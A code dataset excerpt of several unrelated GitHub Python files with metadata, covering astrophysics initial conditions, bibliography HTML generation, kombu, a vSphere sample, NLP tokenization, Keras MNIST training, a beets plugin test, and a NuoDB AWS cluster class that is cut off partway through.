text
stringlengths 4
1.02M
| meta
dict |
|---|---|
"""
Created on Wed Mar 12 12:48:33 2014
@author: ibackus
"""
# External modules
import pynbody
SimArray = pynbody.array.SimArray
import numpy as np
import os
import cPickle as pickle
# ICgen modules
import calc_rho_zr
import calc_temp
import pos_class
import make_snapshot
import ICgen_settings
import make_sigma
import isaac
# Initial stuff
ICgenDir = os.path.dirname(os.path.realpath(__file__))
class IC:
"""
Defines the IC class.
GENERATING NEW INITIAL CONDITIONS
# Generate IC objection from 1-D SimArrays r, sigma (surface density)
IC = ICgen.IC(r, sigma)
"""
def __init__(self, r, sigma):
# Initialize
# Load up default settings
self.settings = ICgen_settings.settings()
# Add modules/attributes
self.T = calc_temp.T(self)
self.maker = maker(self)
self.add = add(self)
# Generate sigma spline interpolation
self.maker.sigma_gen(r, sigma)
# Define a saving function
def saver(filename = None):
"""
A wrapper for ICgen.save
"""
save(self, filename)
self.save = saver
def generate(self, restart=False):
"""
Runs through all the steps to generate a set of initial conditions
IF restart=True, it picks up at the last completed step
"""
if restart:
# Find the last completed step
if hasattr(self, 'pos'): initial_step = 3
elif hasattr(self, 'rho'): initial_step = 2
else: initial_step = 1
else:
initial_step = 1
self.save()
if initial_step <= 1:
# Generate rho
self.maker.rho_gen()
self.save()
if initial_step <= 2:
# Generate positions
self.maker.pos_gen()
self.save()
if initial_step <= 3:
# Generate snapshot
self.maker.snapshot_gen()
self.save()
def save(ICobj, filename=None):
if filename is None:
filename = ICobj.settings.filenames.IC_file_name
save_dict = {}
# --------------------------------------------------
# GET SETTINGS
# --------------------------------------------------
save_dict['settings'] = ICobj.settings
# --------------------------------------------------
# Prepare rho, if available
# --------------------------------------------------
if hasattr(ICobj, 'rho'):
rho = ICobj.rho
# Generate a dictionary containing rho_binned, z_bins, r_bins
rho_dict = {\
'rho': rho.rho_binned,\
'z': rho.z_bins,\
'r': rho.r_bins}
# Update save dictionary
save_dict['rho'] = rho_dict
# --------------------------------------------------
# Prepare sigma, if available
# --------------------------------------------------
if hasattr(ICobj, 'sigma'):
sigma = ICobj.sigma
# Update save dictionary
save_dict['sigma'] = sigma.input_dict
# --------------------------------------------------
# Prepare pos if possible
# --------------------------------------------------
if hasattr(ICobj, 'pos'):
save_dict['pos'] = ICobj.pos
# --------------------------------------------------
# Prepare param if possible
# --------------------------------------------------
if hasattr(ICobj, 'snapshot_param'):
save_dict['snapshot_param'] = ICobj.snapshot_param
param_name = ICobj.settings.filenames.paramName
isaac.configsave(ICobj.snapshot_param, param_name)
print 'param file saved to {}'.format(param_name)
# --------------------------------------------------
# SAVE
# --------------------------------------------------
# Save snapshot if possible
if hasattr(ICobj, 'snapshot'):
fmt = pynbody.tipsy.TipsySnap
fname = ICobj.settings.filenames.snapshotName
save_dict['snapshotName'] = fname
ICobj.snapshot.write(fmt = fmt, filename = fname)
# Save the save dictionary
pickle.dump(save_dict,open(filename,'wb'))
print 'Initial conditions saved to {}'.format(filename)
def load(filename):
# Load everything available from filename
input_dict = pickle.load(open(filename,'rb'))
sigma = input_dict['sigma']['sigma']
r = input_dict['sigma']['r']
ICobj = IC(r, sigma)
# Parse the input dictionary
if 'settings' in input_dict:
print 'loading settings'
ICobj.settings = input_dict['settings']
if 'rho' in input_dict:
print 'loading rho'
ICobj.add.rho(input_dict['rho'])
if 'pos' in input_dict:
print 'loading pos'
ICobj.pos = input_dict['pos']
if 'snapshotName' in input_dict:
print 'loading snapshot'
fname = input_dict['snapshotName']
ICobj.snapshot = pynbody.load(fname)
if 'snapshot_param' in input_dict:
print 'loading param'
ICobj.snapshot_param = input_dict['snapshot_param']
return ICobj
class add:
"""
Contains modules to load data/parameters
"""
def __init__(self, ICobj):
self._parent = ICobj
def rho(self,rho_dict):
"""
Generates a rho object and stores it in ICobj.rho
rho_dict should be a dictionary containing:
'z': 1D array of z values
'r': 1D array of r values
'rho': 2D array of rho evaluated at z,r
Exaple:
rho_dict = pickle.load(open('rhofile.p', 'rb')) # Load up a rho dict
ICobj.add.rho(rho_dict) # create ICobj.rho
"""
# Create rho object (includes a spline interpolation)
rho_binned = rho_dict['rho']
z_bins = rho_dict['z']
r_bins = rho_dict['r']
self._parent.rho = calc_rho_zr.rho_from_array(self._parent, rho_binned, z_bins, r_bins)
print 'rho stored in <IC instance>.rho'
class maker:
"""
A Wrapper containing various functions for generating initial conditions.
Outputs of the functions are saved to the IC object. The IC object is
referenced as self._parent. So to access temperature, simply call
self._parent.T(r)
"""
def __init__(self, ICobj):
self._parent = ICobj
def sigma_gen(self, r, sigma):
"""
A Wrapper for make_sigma.sigma_gen
See make_sigma.sigma_gen for documentation
Upon executing, generates sigma, pdf, and cdf_inv and saves to ICobj
USAGE:
ICobj.maker.sigma_gen(r, sigma)
r and sigma should be 1-D SimArrays. sigma is the surface density
evaluated at r
"""
# Generate sigma
sigma = make_sigma.sigma_gen(r, sigma)
# Copy sigma to the parent (IC) object
self._parent.sigma = sigma
print 'Sigma stored in <IC instance>.sigma'
def rho_gen(self):
"""
A wrapper for calc_rho_zr.
Upon executing, generates rho and rho cdf inverse
"""
# Check that sigma has been generated
if not hasattr(self._parent, 'sigma'):
raise RuntimeError,'Must load/generate sigma before calculating rho'
# Numerically calculate rho(z,r) for a given sigma. rho(z,r)
# obeys vertical hydrostatic equilibrium (approximately)
rho_array, z, r = calc_rho_zr.rho_zr(self._parent)
# Create a complete rho object. Includes rho spline and CDF inverse
rho = calc_rho_zr.rho_from_array(self._parent, rho_array, z, r)
# Save to ICobj
self._parent.rho = rho
print 'rho stored in <IC instance>.rho'
def pos_gen(self, method = None):
"""
A wrapper for generating positions according to rho and sigma
Initializes a pos object (see pos_class.py) and saves it to ICobj.pos
IF called with method not set, the method used is:
ICobj.settings.pos_gen.method
"""
# Generate positions object
pos = pos_class.pos(self._parent, method)
# Save it to ICobj
self._parent.pos = pos
def snapshot_gen(self):
"""
A wrapper for generating a tipsy snapshot from the initial conditions
Uses make_snapshot.py
"""
# Generate snapshot
snapshot, snapshot_param = make_snapshot.snapshot_gen(self._parent)
# Save to ICobj
self._parent.snapshot = snapshot
self._parent.snapshot_param = snapshot_param
|
{
"content_hash": "472a4e51be14c192bf2c5e499ec63267",
"timestamp": "",
"source": "github",
"line_count": 316,
"max_line_length": 95,
"avg_line_length": 28.949367088607595,
"alnum_prop": 0.5099475295146481,
"repo_name": "dflemin3/ICgen",
"id": "8ddfb9f0df5ef582ca18d4d06d05a6b82e040ef1",
"size": "9172",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "backup02/ICgen.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "516765"
}
],
"symlink_target": ""
}
|
import bibtexparser
#from bibtexparser.bparser import BibTexParser
from bibtexparser.customization import *
import codecs
#import sys
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
HTML = 1
LATEX = 2
def customizations(record):
"""Use some functions delivered by the library
:param record: a record
:returns: -- customized record
"""
record = type(record)
record = author(record)
record = editor(record)
record = journal(record)
record = keyword(record)
record = link(record)
record = page_double_hyphen(record)
record = doi(record)
return record
def build_topics_to_titles_with_id(bib_database):
id_to_entry = {}
topics_to_titles_with_id = {}
for entry in bib_database.entries:
if entry.has_key('id'): # probably unecessary, but for now
id_to_entry[entry['id']] = entry
if entry.has_key('keyword'):
keywords = [keyword.strip().lower() for keyword in entry['keyword'].split(',')]
for keyword in set(keywords):
if not topics_to_titles_with_id.has_key(keyword):
topics_to_titles_with_id[keyword] = []
if entry.has_key('title') and entry.has_key('id'):
topics_to_titles_with_id[keyword].append((entry['id'], entry['title']))
return (topics_to_titles_with_id, id_to_entry)
def create_hyperlinks_to_topics(topics_to_titles_with_id, ignore_topics, out_fh, output_type):
#global topic, topic_line_len, spaceless_topic
topic_line_len = 0
for topic in sorted(topics_to_titles_with_id):
topic = topic.lower().strip()
if not topic.lower().strip() in ignore_topics:
topic_line_len += len(topic) + 3
#if topic_line_len > 100:
# out_fh.write(u"<br>\n")
# topic_line_len = 0
spaceless_topic = topic.replace(u' ', u'_')
out_fh.write(u'''<a href="#%s">[%s]</a> ''' % (spaceless_topic, topic))
# print topic, len(topics_to_titles_with_id[topic]), topics_to_titles_with_id[topic][:2]
def create_list_of_titles_per_topic(topics_to_titles_with_id, ignore_topics, out_fh, output_type):
for topic in sorted(topics_to_titles_with_id):
topic = topic.lower().strip()
if not topic in ignore_topics:
spaceless_topic = topic.replace(' ', '_')
out_fh.write(u'''<h2><a name="%s"></a>%s</h2>''' % (spaceless_topic, topic.title()))
out_fh.write(u"\n")
out_fh.write(u"<ol>")
out_fh.write(u"\n")
for (pubid, title) in topics_to_titles_with_id[topic]:
out_fh.write(u"<li><a href=\"#%s\">%s</a>" % (pubid, title))
out_fh.write(u"\n")
out_fh.write(u"</ol>")
out_fh.write(u"\n")
out_fh.write("<br>")
def create_bibtex_bibliography(id_to_entry, out_fh, output_type):
for pubid in sorted(id_to_entry):
entry = id_to_entry[pubid]
#print entry
#print dir(entry)
#print help(entry)
#out_fh.write(entry)
#print entry
field_order = ["title","author","journal","booktitle","volume","number","pages",
"month","year","organization","publisher","school","keywords"]
searchable_fields = ["title","author","journal","booktitle","organization","school"]
bibtex_types = {"article":"@article",
"inproceedings":"@inproceedings",
"incollection":"@incollection",
"phdthesis":"@phdthesis",
"misc":"@misc",
"techreport":"@techreport"}
out_fh.write(u"\n")
out_fh.write(bibtex_types[entry["type"]])
out_fh.write("{<a name=\"%s\"></a>%s" % (pubid,pubid))
for field in field_order:
if not field in ["type", "id"] and entry.has_key(field):
out_fh.write(",\n")
if len(entry[field].strip()) > 0:
if field in searchable_fields:
search_query = entry[field].replace(u' ',u'+')
out_fh.write(u''' %s = {<a href="http://google.com/search?q=%s">%s</a>}''' % (field, search_query, entry[field]))
else:
out_fh.write(u''' %s = {%s}''' % (field, entry[field]))
out_fh.write("\n}\n")
#sys.exit(0)
#for field in field_order: if entry.has_key(field)
out_fh.write(u"\n")
def main(bibtexfilepath, out_fh, output_type):
with open(bibtexfilepath) as bibtex_file:
bibtex_str = bibtex_file.read()
bib_database = bibtexparser.loads(bibtex_str)
#print(bib_database.entries)
(topics_to_titles_with_id, id_to_entry) = build_topics_to_titles_with_id(bib_database)
ignore_topics = ['', 'misc']
out_fh.write(codecs.open('header.html',encoding="utf-8").read())
# a) create hyperlinks to topics
create_hyperlinks_to_topics(topics_to_titles_with_id, ignore_topics, out_fh, output_type=HTML)
# b) create list of titles per topic
create_list_of_titles_per_topic(topics_to_titles_with_id, ignore_topics, out_fh, output_type=HTML)
# c) create bibtex list at the end, that get pointed to by 2
#for pubid in sorted(id_to_entry):
# print '''<a name="%s"></a>''' % (pubid)
#parser = BibTexParser()
#parser.customization = customizations
#bib_database = bibtexparser.loads(bibtex_str, parser=parser)
#print(bib_database.entries)
out_fh.write("<h1>BIBLIOGRAPHY</h1>")
out_fh.write("<pre>\n")
create_bibtex_bibliography(id_to_entry,out_fh=out_fh,output_type=HTML)
out_fh.write("</pre>\n")
out_fh.write("</ul>")
if __name__ == "__main__":
out_fh = codecs.open("deeplearningbibliography20150415.html", "wb", encoding="utf-8")
#main(bibtexfilepath = '../bibtex/deeplearninggpuwithkeywords2014.bib', out_fh=out_fh, output_type=HTML)
#main(bibtexfilepath = '../bibtex/deeplearninggpuwithkeywords2014.bib', out_fh=out_fh, output_type=HTML)
#main(bibtexfilepath = '../bibtex/deeplearninggpuwithkeywords2014.bib', out_fh=out_fh, output_type=HTML)
main(bibtexfilepath = '../miscdata/rawdata.bib', out_fh=out_fh, output_type=HTML)
out_fh.close()
|
{
"content_hash": "63c71135985f036a7a127be4606a4544",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 138,
"avg_line_length": 38.5,
"alnum_prop": 0.5776873728680958,
"repo_name": "memkite/DeepLearningBibliography",
"id": "2ee7c8674e93659f71bd3a761a152748d70f6e5f",
"size": "6414",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/process_bibliography.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "4104664"
},
{
"name": "Python",
"bytes": "66179"
},
{
"name": "Shell",
"bytes": "225"
},
{
"name": "TeX",
"bytes": "2296969"
}
],
"symlink_target": ""
}
|
"""Messaging library for Python"""
from __future__ import absolute_import
from collections import namedtuple
version_info_t = namedtuple(
'version_info_t', ('major', 'minor', 'micro', 'releaselevel', 'serial'),
)
VERSION = version_info_t(3, 0, 7, '', '')
__version__ = '{0.major}.{0.minor}.{0.micro}{0.releaselevel}'.format(VERSION)
__author__ = 'Ask Solem'
__contact__ = 'ask@celeryproject.org'
__homepage__ = 'http://kombu.readthedocs.org'
__docformat__ = 'restructuredtext en'
# -eof meta-
import os
import sys
if sys.version_info < (2, 6): # pragma: no cover
raise Exception('Kombu 3.1 requires Python versions 2.6 or later.')
STATICA_HACK = True
globals()['kcah_acitats'[::-1].upper()] = False
if STATICA_HACK: # pragma: no cover
# This is never executed, but tricks static analyzers (PyDev, PyCharm,
# pylint, etc.) into knowing the types of these symbols, and what
# they contain.
from kombu.connection import Connection, BrokerConnection # noqa
from kombu.entity import Exchange, Queue, binding # noqa
from kombu.messaging import Consumer, Producer # noqa
from kombu.pools import connections, producers # noqa
from kombu.utils.url import parse_url # noqa
from kombu.common import eventloop, uuid # noqa
from kombu.serialization import ( # noqa
enable_insecure_serializers,
disable_insecure_serializers,
)
# Lazy loading.
# - See werkzeug/__init__.py for the rationale behind this.
from types import ModuleType
all_by_module = {
'kombu.connection': ['Connection', 'BrokerConnection'],
'kombu.entity': ['Exchange', 'Queue', 'binding'],
'kombu.messaging': ['Consumer', 'Producer'],
'kombu.pools': ['connections', 'producers'],
'kombu.utils.url': ['parse_url'],
'kombu.common': ['eventloop', 'uuid'],
'kombu.serialization': ['enable_insecure_serializers',
'disable_insecure_serializers'],
}
object_origins = {}
for module, items in all_by_module.items():
for item in items:
object_origins[item] = module
class module(ModuleType):
def __getattr__(self, name):
if name in object_origins:
module = __import__(object_origins[name], None, None, [name])
for extra_name in all_by_module[module.__name__]:
setattr(self, extra_name, getattr(module, extra_name))
return getattr(module, name)
return ModuleType.__getattribute__(self, name)
def __dir__(self):
result = list(new_module.__all__)
result.extend(('__file__', '__path__', '__doc__', '__all__',
'__docformat__', '__name__', '__path__', 'VERSION',
'__package__', '__version__', '__author__',
'__contact__', '__homepage__', '__docformat__'))
return result
# 2.5 does not define __package__
try:
package = __package__
except NameError: # pragma: no cover
package = 'kombu'
# keep a reference to this module so that it's not garbage collected
old_module = sys.modules[__name__]
new_module = sys.modules[__name__] = module(__name__)
new_module.__dict__.update({
'__file__': __file__,
'__path__': __path__,
'__doc__': __doc__,
'__all__': tuple(object_origins),
'__version__': __version__,
'__author__': __author__,
'__contact__': __contact__,
'__homepage__': __homepage__,
'__docformat__': __docformat__,
'__package__': package,
'VERSION': VERSION})
if os.environ.get('KOMBU_LOG_DEBUG'): # pragma: no cover
os.environ.update(KOMBU_LOG_CHANNEL='1', KOMBU_LOG_CONNECTION='1')
from .utils import debug
debug.setup_logging()
|
{
"content_hash": "71bdbc3d150bbceb1699940d0006cbdd",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 77,
"avg_line_length": 35.47663551401869,
"alnum_prop": 0.5879873551106428,
"repo_name": "andresriancho/kombu",
"id": "37c9cc1c7df9ca575960343f44fb430caaf3b8d4",
"size": "3796",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "kombu/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "714416"
},
{
"name": "Shell",
"bytes": "2059"
}
],
"symlink_target": ""
}
|
"""
* *******************************************************
* Copyright (c) VMware, Inc. 2016, 2018. All Rights Reserved.
* SPDX-License-Identifier: MIT
* *******************************************************
*
* DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
* EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
* WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
* NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""
__author__ = 'VMware, Inc.'
__copyright__ = 'Copyright 2018 VMware, Inc. All rights reserved.'
__vcenter_version__ = '6.7+'
from vmware.vapi.vsphere.client import create_vsphere_client
from samples.vsphere.common.ssl_helper import get_unverified_session
from samples.vsphere.common import sample_cli
from samples.vsphere.common import sample_util
class ListServices(object):
"""
Demonstrates the details of vCenter Services
Retrieves the vCenter Services, its Health Status and Service Startup Type.
Prerequisites:
- vCenter Server
"""
def __init__(self):
# Create argument parser for standard inputs:
# server, username, password and skipverification
parser = sample_cli.build_arg_parser()
args = sample_util.process_cli_args(parser.parse_args())
# Skip server cert verification if needed.
# This is not recommended in production code.
session = get_unverified_session() if args.skipverification else None
# Connect to vSphere client
self.client = create_vsphere_client(
server=args.server,
username=args.username,
password=args.password,
session=session)
def run(self):
services_list = self.client.vcenter.services.Service.list_details()
for key, value in services_list.items():
print(
'Service Name: {}, Service Name Key: {}, Service Health: {}, Service Status: {}, Service Startup Type: {}'
).format(key, value.name_key, value.health, value.state,
value.startup_type)
def main():
list_services = ListServices()
list_services.run()
if __name__ == '__main__':
main()
|
{
"content_hash": "a56cd3417f7704341cb795afeb0d099b",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 122,
"avg_line_length": 33.88059701492537,
"alnum_prop": 0.6352422907488987,
"repo_name": "tianhao64/vsphere-automation-sdk-python",
"id": "3752c8b4f90c0ca562a1401d755dc161ae23f39e",
"size": "2292",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "samples/vsphere/services/services_list.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1596"
},
{
"name": "Python",
"bytes": "11861"
}
],
"symlink_target": ""
}
|
"""Functions for document tokenization."""
import string
import regex as re
# This is designed to match:
# - unicode separators (spaces, paragraph separators, etc.)
# - unicode symbols (math symbols, currency symbols, etc.)
# - other symbols (control characters, formatting indicators, etc.)
# These typically will get in the way of algorithms operating at
# the word level, so we want to substitute them out.
SEPARATOR_SYMBOL_FILTER = re.compile(
r'[\p{Separator}\p{Symbol}\p{Other}]+',
flags=re.MULTILINE
)
# This is designed to match a sequence of four symbols that are either:
# - unicode punctuation
# - unicode separators (spaces, paragraph separators, etc.)
# We want to keep some punctuation so we can parse phrases, sentences, acronyms
# and names with dots in them, but input text often has needless or excessive
# punctuation as leftover entrails from whatever system we pulled the text
# out of.
EXCESSIVE_PUNCTUATION = re.compile(
r'[\p{Punctuation}\p{Separator}]{4,}',
flags=re.MULTILINE
)
SPECIAL_CHARACTERS = re.compile(
r'[\p{Punctuation}\p{Separator}\p{Symbol}\p{Other}]+',
flags=re.MULTILINE
)
# These are OntoNotes 5 / Penn TreeBank tags for Spacy tokens that
# we probably don't want to include.
FILTERED_TOKENS = (
'XX', # unknown tokens
'ADD', # email addresses
'CD', # cardinal number
'SP', # space(s)
'$', # currency
'SYM' # symbols
)
PUNCTUATION = set(string.punctuation)
def clean_unicode_punctuation(input_str):
"""
Clean up Unicode punctuation in an input string.
Replace unicode separators and symbols with ASCII spaces.
Replace (punctuation, separator) sequences of >=4 with
an ASCII period and a space.
"""
partial = SEPARATOR_SYMBOL_FILTER.sub(' ', input_str)
return EXCESSIVE_PUNCTUATION.sub('. ', partial)
def str_is_all_punctuation(input_str):
"""
Return True if input_str is made up of ASCII punctuation.
This is necessary because Spacy doesn't always figure out
whether a token is punctuation, and this is easier than figuring
out how to fix Spacy's tokenizer.
"""
return len(set(input_str).difference(PUNCTUATION)) == 0
def is_bad_token(token):
"""Filter tokens that aren't good for machine learning.
Returns True if the token is bad.
The `token` argument needs to be a Spacy Token object.
"""
return (
token.tag_ in FILTERED_TOKENS or
token.is_punct or
token.is_stop or
token.like_num or
token.like_url or
# get rid of errant email addresses
'@' in token.text or
# this is going to clobber some useful words
# like "car", but it also gets rid of a lot of crap.
len(token) < 4 or
str_is_all_punctuation(token.text)
)
def tokenize_with_spacy(doc):
"""Turn a single document into a generator of tokens.
The `doc` argument needs to be a Spacy Document.
"""
for ent in doc.ents:
if len(ent) > 1:
ent.merge(ent.root.tag_, ent.text, ent.root.ent_type_)
for token in doc:
if is_bad_token(token):
continue
text = ' '.join(token.lemma_.strip().split()).replace(' ', '_')
if text:
yield text
|
{
"content_hash": "2aa6bdaf0108d7852f3909c5995c06a5",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 79,
"avg_line_length": 30.69811320754717,
"alnum_prop": 0.6644130301167793,
"repo_name": "jamesmishra/nlp-playground",
"id": "2a1873ae342c30d52b75f1d1e7bddddc0d7717cd",
"size": "3254",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nlp_playground/lib/tokenize.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "76418"
},
{
"name": "Shell",
"bytes": "2459"
}
],
"symlink_target": ""
}
|
import sys
if len(sys.argv) < 2:
print "mostocc.py column_in_fort.38"
sys.exit(0)
# get occupancy from fort.38 column 8
OccTable = {}
fort38 = open("fort.38").readlines()
column = int(sys.argv[1])
for line in fort38:
# get confID
fields = line.split()
if len(fields[0]) == 14:
confID = fields[0]
occ = float(fields[column])
OccTable[confID] = occ
# group into residues
OccInRes = {}
for conf in OccTable.keys():
resID = conf[:3]+conf[5:11]
if OccInRes.has_key(resID):
OccInRes[resID].append((conf, OccTable[conf]))
else:
OccInRes[resID] = [(conf, OccTable[conf])]
# get max conf
maxConfs = []
for res in OccInRes.keys():
confs = OccInRes[res]
maxocc = confs[0]
for conf in confs:
if conf[1] > maxocc[1]:
maxocc = conf
maxConfs.append(maxocc[0])
#for x in maxConfs: print x
# read in a file and keep only the most occupied confs
pdb = open("step3_out.pdb").readlines()
outpdb = []
for line in pdb:
if len(line) <82: continue
if line[26] == ' ': iCode = '_'
else: iCode = line[26]
confID = line[17:20]+line[80:82]+line[21:26]+iCode+line[27:30]
if confID in maxConfs or confID[3:5] == 'BK':
outpdb.append(line)
sys.stdout.writelines(outpdb)
|
{
"content_hash": "6b67061affe7833a5bfc1cd11c37e2b9",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 65,
"avg_line_length": 23.62264150943396,
"alnum_prop": 0.6269968051118211,
"repo_name": "MarilyGunnersLab/MCCE",
"id": "3b60496e00c29bdc863b6013c12dfce61f01543c",
"size": "1271",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mcce_stable/bin/mostocc.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "2280903"
},
{
"name": "FORTRAN",
"bytes": "626441"
},
{
"name": "Groff",
"bytes": "1676"
},
{
"name": "Makefile",
"bytes": "8378"
},
{
"name": "Perl",
"bytes": "515"
},
{
"name": "Python",
"bytes": "72552"
},
{
"name": "Shell",
"bytes": "47"
},
{
"name": "Smarty",
"bytes": "2229816"
}
],
"symlink_target": ""
}
|
'''Trains a simple convnet on the MNIST dataset.
Gets to 99.25% test accuracy after 12 epochs
(there is still a lot of margin for parameter tuning).
16 seconds per epoch on a GRID K520 GPU.
'''
from __future__ import print_function
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
from keras.models import load_model
batch_size = 128
num_classes = 10
epochs = 12
# input image dimensions
img_rows, img_cols = 28, 28
# the data, shuffled and split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data()
if K.image_data_format() == 'channels_first':
x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)
x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
# HDF5ファイルを作成
model.save('mnist_cnn_model.h5')
|
{
"content_hash": "5e99e89a03f1b2196cdf2bac00e8511f",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 70,
"avg_line_length": 31.4,
"alnum_prop": 0.6874734607218683,
"repo_name": "yoshiweb/keras-mnist",
"id": "0689c072547f81306cca07dad461df4f0850c7f6",
"size": "2369",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "keras-mnist/mnist_cnn/mnist_cnn_train.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "5800"
}
],
"symlink_target": ""
}
|
"""Tests for the 'ihate' plugin"""
from _common import unittest
from beets import importer
from beets.library import Item
from beetsplug.ihate import IHatePlugin
class IHatePluginTest(unittest.TestCase):
def test_hate(self):
match_pattern = {}
test_item = Item(
genre='TestGenre',
album=u'TestAlbum',
artist=u'TestArtist')
task = importer.SingletonImportTask(test_item)
# Empty query should let it pass.
self.assertFalse(IHatePlugin.do_i_hate_this(task, match_pattern))
# 1 query match.
match_pattern = ["artist:bad_artist","artist:TestArtist"]
self.assertTrue(IHatePlugin.do_i_hate_this(task, match_pattern))
# 2 query matches, either should trigger.
match_pattern = ["album:test","artist:testartist"]
self.assertTrue(IHatePlugin.do_i_hate_this(task, match_pattern))
# Query is blocked by AND clause.
match_pattern = ["album:notthis genre:testgenre"]
self.assertFalse(IHatePlugin.do_i_hate_this(task, match_pattern))
# Both queries are blocked by AND clause with unmatched condition.
match_pattern = ["album:notthis genre:testgenre",
"artist:testartist album:notthis"]
self.assertFalse(IHatePlugin.do_i_hate_this(task, match_pattern))
# Only one query should fire.
match_pattern = ["album:testalbum genre:testgenre",
"artist:testartist album:notthis"]
self.assertTrue(IHatePlugin.do_i_hate_this(task, match_pattern))
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
{
"content_hash": "7c85e09a843518c59971e18830229705",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 74,
"avg_line_length": 34.44,
"alnum_prop": 0.648664343786295,
"repo_name": "accesso/beets",
"id": "b9c6eb114a8dc1cb2101d40214fb09b7474a1c6b",
"size": "1722",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/test_ihate.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
}
|
'''
Created on Jan 28, 2014
@author: rkourtz
'''
import boto.route53
import nuodbTools.aws
import inspect, json, os, random, string, sys, time
class Cluster:
def __init__(self,
alert_email = "alert@example.com",
aws_access_key = "",
aws_secret = "",
brokers_per_zone = 2,
cluster_name = "default",
data_dir = "/".join([os.path.dirname(os.path.abspath(inspect.stack()[-1][1])), "data"]),
dns_domain="",
domain_name="domain",
domain_password="bird",
enable_monitoring = True,
instance_type = "m3.large",
nuodb_license = "",
ssh_key = "",
ssh_keyfile = None):
self.route53 = boto.route53.connection.Route53Connection(aws_access_key_id=aws_access_key, aws_secret_access_key=aws_secret)
args, _, _, values = inspect.getargvalues(inspect.currentframe())
for i in args:
setattr(self, i, values[i])
if ssh_keyfile != None and ssh_keyfile != "":
if not os.path.exists(ssh_keyfile):
raise Error("Can not find ssh private key %s" % self.ssh_keyfile)
if dns_domain == None or dns_domain == "None" or dns_domain == "":
self.dns_domain = "NuoDB"
self.dns_emulate = True
else:
self.dns_emulate = False
self.db = {}
self.zones = {} #store our zone connections
def add_host(self, name, zone, ami = "", security_group_ids=[], subnets = [], agentPort = 48004 , subPortRange = 48005, nuodb_rpm_url = None, start_services = True):
if zone not in self.zones:
raise Error("You must connect to a zone first before you can add a host in that zone")
if len(subnets) == 0:
raise Error("You must specify the target subnets in an array")
# make sure ami is valid
valid_amis = []
for each_ami in self.zones[zone].amis:
valid_amis.append(each_ami.id)
if ami not in valid_amis:
raise Error("ami '%s' is not valid" % (ami))
stub = self.db['customers'][self.cluster_name]['zones'][zone]['hosts']
if name == None:
increment = len(stub)
basename = "db"+str(increment)
else:
basename = name
increment = random.randrange(0,len(subnets))
host = ".".join([basename, self.cluster_name, zone, self.dns_domain])
if host not in stub:
stub[host] = {}
# Generate data for chef... is it a broker? peers?
agent_addr = host
if "zones" not in self.db['customers'][self.cluster_name]:
self.db['customers'][self.cluster_name]['zones'] = {}
if zone not in self.db['customers'][self.cluster_name]['zones']:
self.db['customers'][self.cluster_name]['zones'][zone] = {"brokers": []}
if "chef_data" not in stub[host]:
if len(self.db['customers'][self.cluster_name]['zones'][zone]['brokers']) < 1:
isBroker = True
